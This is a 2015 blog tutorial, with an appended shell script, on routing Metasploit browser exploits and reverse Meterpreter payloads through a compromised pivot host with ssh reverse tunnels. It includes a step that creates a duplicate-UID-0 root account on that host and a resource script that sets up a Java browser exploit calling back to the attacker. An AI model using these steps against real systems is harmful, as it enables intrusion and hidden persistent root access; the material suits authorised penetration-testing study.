Tuesday, August 18, 2015

How to use ssh pivoting with Metasploit exploits that require SRVHOST/SRVPORT and LHOST/LPORT

In my quest to get ssh pivoting working with Metasploit exploits, I found many examples of how to add routes and pivot through Metasploit. What I couldn't find were examples of how to do this with exploits and payloads that require both SRVHOST/SRVPORT and LHOST/LPORT. An example is a target that only has port 3389 open: you hook its browser with a client-side exploit, so you need a reverse payload that connects back to you through the pivot host.

When I used an established Meterpreter session, backgrounded it, and added a route with "route add x.x.x.x x.x.x.x 1", then ran an exploit with the pivot host's IP/port as LHOST/LPORT for the payload's reverse connection, Metasploit would start the LHOST/LPORT listener but error out on the SRVHOST/SRVPORT listener when given the pivot host's IP address. The difference is that the reverse handler can be opened through the Meterpreter session's routes, whereas SRVHOST has to be an address on the local machine.

My pivot host, the one I have a Meterpreter session on, sits on the target's 10.x.x.x network; my Kali VM has IP address 192.168.x.x; and I'm trying to lure the victim to my Metasploit browser exploit server. The victim has no route to my Kali host, so a pivot is required.

In the exploit settings, if I used the pivot host's IP address for both SRVHOST and LHOST, Metasploit would establish the LHOST listener (for the reverse payload) using the IP address of the Meterpreter session host, but would throw errors for SRVHOST because that address wasn't on my local machine. (I'm running this on Kali 2.0 if it makes any difference.)

What ended up working for me:

On your pivot host (the machine whose sshd accepts the reverse tunnel; Kali only acts as the ssh client here, so setting it there is harmless but not required), add GatewayPorts yes to /etc/ssh/sshd_config, for example with "echo "GatewayPorts yes" >> /etc/ssh/sshd_config", and restart the ssh service first. Without it, a remote forward (ssh -R) is bound only to the loopback address on the pivot host, so the forwarded port is unreachable to the victim; with GatewayPorts yes (or GatewayPorts clientspecified, which lets the bind address given in the -R option decide) the listener can be reached on the pivot host's interfaces. One caveat: sshd uses the first value it finds for a keyword, so an appended line only takes effect if no earlier uncommented GatewayPorts line sits above it. Confirm the effective setting with "sshd -T | grep -i gatewayports" before opening the tunnels.

When pivoting into another network with any exploit that needs both SRVHOST/SRVPORT and LHOST/LPORT, I set up two reverse ssh tunnels from Kali to the pivot host:
ssh -R 10.x.x.xPivotHostIP:8000:KaliIPaddress:8001 username@pivothostIP
ssh -R 10.x.x.xPivotHostIP:9000:KaliIPaddress:9001 username@pivothostIP
... and set SRVHOST/SRVPORT to KaliIPaddress/8001 and LHOST/LPORT to KaliIPaddress/9001. Each -R makes sshd on the pivot host listen on the named address and port and relay connections back to Kali: 10.x.x.xPivotHostIP:8000 is the exploit server the victim sees, and 10.x.x.xPivotHostIP:9000 is where the reverse payload's callback should arrive. Keep in mind that a reverse payload embeds LHOST/LPORT as the address it connects back to, so a victim that cannot reach KaliIPaddress must be given the pivot host's address instead. Metasploit's reverse handlers have the advanced options ReverseListenerBindAddress and ReverseListenerBindPort for exactly this case: LHOST=10.x.x.xPivotHostIP and LPORT=9000 with ReverseListenerBindAddress=KaliIPaddress and ReverseListenerBindPort=9001 makes the payload call the pivot host's forwarded port while the handler itself listens on Kali.

I set URIPATH to "/" and lured the victim to http://10.x.x.xPivotHostIP:8000/, which the tunnel relays to KaliIPaddress:8001. If the exploit builds absolute URLs from SRVHOST/SRVPORT, the HttpServer mixin's advanced URIHOST and URIPORT options (which Metasploit describes as being for tunnels) let you put 10.x.x.xPivotHostIP and 8000 into those URLs while the server still binds on Kali.

I wasn't able to establish two ssh tunnels with the same username, as the first session would disconnect when I established the second, so I created another user first. (ssh also accepts several -R options in a single invocation, which carries both forwards over one session and avoids the second account.) You can create a root-equivalent user from a non-interactive session with:

useradd -ou 0 -g 0 username
echo "username:password"|chpasswd

Here -o allows the duplicate UID 0, so the new account has root privileges on the pivot host; remove it when the engagement is finished.
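The whole procedure above, as an added example that is not code from the original post: a shell script that composes the two reverse forwards in a single ssh invocation, writes the Metasploit settings from the write-up as a resource script, reads the effective GatewayPorts value out of an sshd_config (first occurrence wins), and classifies how a forwarded port is bound on the pivot host from `ss -ltn` output. The addresses (10.0.0.5 for the pivot host, 192.168.56.10 for Kali), the user name tunneluser, the module exploit/multi/browser/java_jre17_jmxbean and the sample ss and sshd_config text are all assumptions constructed for the example.

```shell
#!/bin/bash
# Added example, not from the original post: compose the ssh reverse tunnels and
# the Metasploit settings from the write-up, and check that a forwarded port on
# the pivot host is bound somewhere the victim can reach. Every address, port,
# module and user name below is a placeholder (assumption), not a value from the post.
set -u

PIVOT_IP="${PIVOT_IP:-10.0.0.5}"        # stands in for 10.x.x.xPivotHostIP
KALI_IP="${KALI_IP:-192.168.56.10}"     # stands in for KaliIPaddress
PIVOT_USER="${PIVOT_USER:-tunneluser}"  # ssh account on the pivot host

# Both remote forwards in one ssh invocation (one session, no second user):
#   pivot:8000 -> Kali:8001  (browser exploit server, SRVHOST/SRVPORT)
#   pivot:9000 -> Kali:9001  (reverse payload handler, LHOST/LPORT)
# -N opens no shell; the named bind address needs GatewayPorts yes (or
# clientspecified) in the pivot host's sshd_config.
build_tunnel_cmd() {
  local pivot_ip=$1 kali_ip=$2 user=$3
  printf 'ssh -N -R %s:8000:%s:8001 -R %s:9000:%s:9001 %s@%s' \
    "$pivot_ip" "$kali_ip" "$pivot_ip" "$kali_ip" "$user" "$pivot_ip"
}

# msfconsole resource script with the post's settings: both servers bind on
# Kali, behind the tunnels. Save the output and run: msfconsole -r pivot.rc
build_msf_rc() {
  local kali_ip=$1 module=$2 payload=$3
  cat <<EOF
use $module
set SRVHOST $kali_ip
set SRVPORT 8001
set URIPATH /
set PAYLOAD $payload
set LHOST $kali_ip
set LPORT 9001
exploit -j
EOF
}

# First uncommented GatewayPorts value in sshd_config text. sshd honours the
# first occurrence, so a line appended with >> is ignored when an earlier
# active line already sets the keyword. Prints "no" (the default) when unset.
gatewayports_setting() {
  printf '%s\n' "$1" | awk 'tolower($1)=="gatewayports" && !seen {v=$2; seen=1}
                            END {print (seen ? v : "no")}'
}

# Classify how a forwarded port is bound on the pivot host, given `ss -ltn`
# text: "missing" (no listener), "loopback" (GatewayPorts was off, the victim
# cannot reach it) or "reachable" (a specific or wildcard interface address).
forward_bind_state() {
  local port=$1 ss_out=$2 addr
  addr=$(printf '%s\n' "$ss_out" |
         awk -v p="$port" '$1=="LISTEN" {n=split($4,a,":"); if (a[n]==p) {print $4; exit}}')
  case "$addr" in
    "")                            echo "missing" ;;
    127.*|\[::1\]:*|localhost:*)   echo "loopback" ;;
    *)                             echo "reachable" ;;
  esac
}

# Constructed sample output (not a real capture): port 8000 ended up on
# loopback, which is what you see when GatewayPorts is still "no".
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    127.0.0.1:8000    0.0.0.0:*
LISTEN 0      128    10.0.0.5:9000     0.0.0.0:*
LISTEN 0      128    [::]:22           [::]:*'

# Constructed sshd_config fragment: the appended "yes" never takes effect.
SAMPLE_SSHD_CONFIG='#GatewayPorts no
GatewayPorts no
GatewayPorts yes'

echo "tunnel command: $(build_tunnel_cmd "$PIVOT_IP" "$KALI_IP" "$PIVOT_USER")"
echo "effective GatewayPorts in sample config: $(gatewayports_setting "$SAMPLE_SSHD_CONFIG")"
echo "port 8000 on pivot: $(forward_bind_state 8000 "$SAMPLE_SS")"
echo "port 9000 on pivot: $(forward_bind_state 9000 "$SAMPLE_SS")"
echo "--- pivot.rc ---"
build_msf_rc "$KALI_IP" exploit/multi/browser/java_jre17_jmxbean windows/meterpreter/reverse_tcp
```

On a real pivot host, feed forward_bind_state the live output of "ss -ltn" (or "netstat -ltn") after opening the tunnel; a "loopback" result for 8000 or 9000 means the GatewayPorts change has not taken effect, and "sshd -T | grep -i gatewayports" shows what sshd actually loaded.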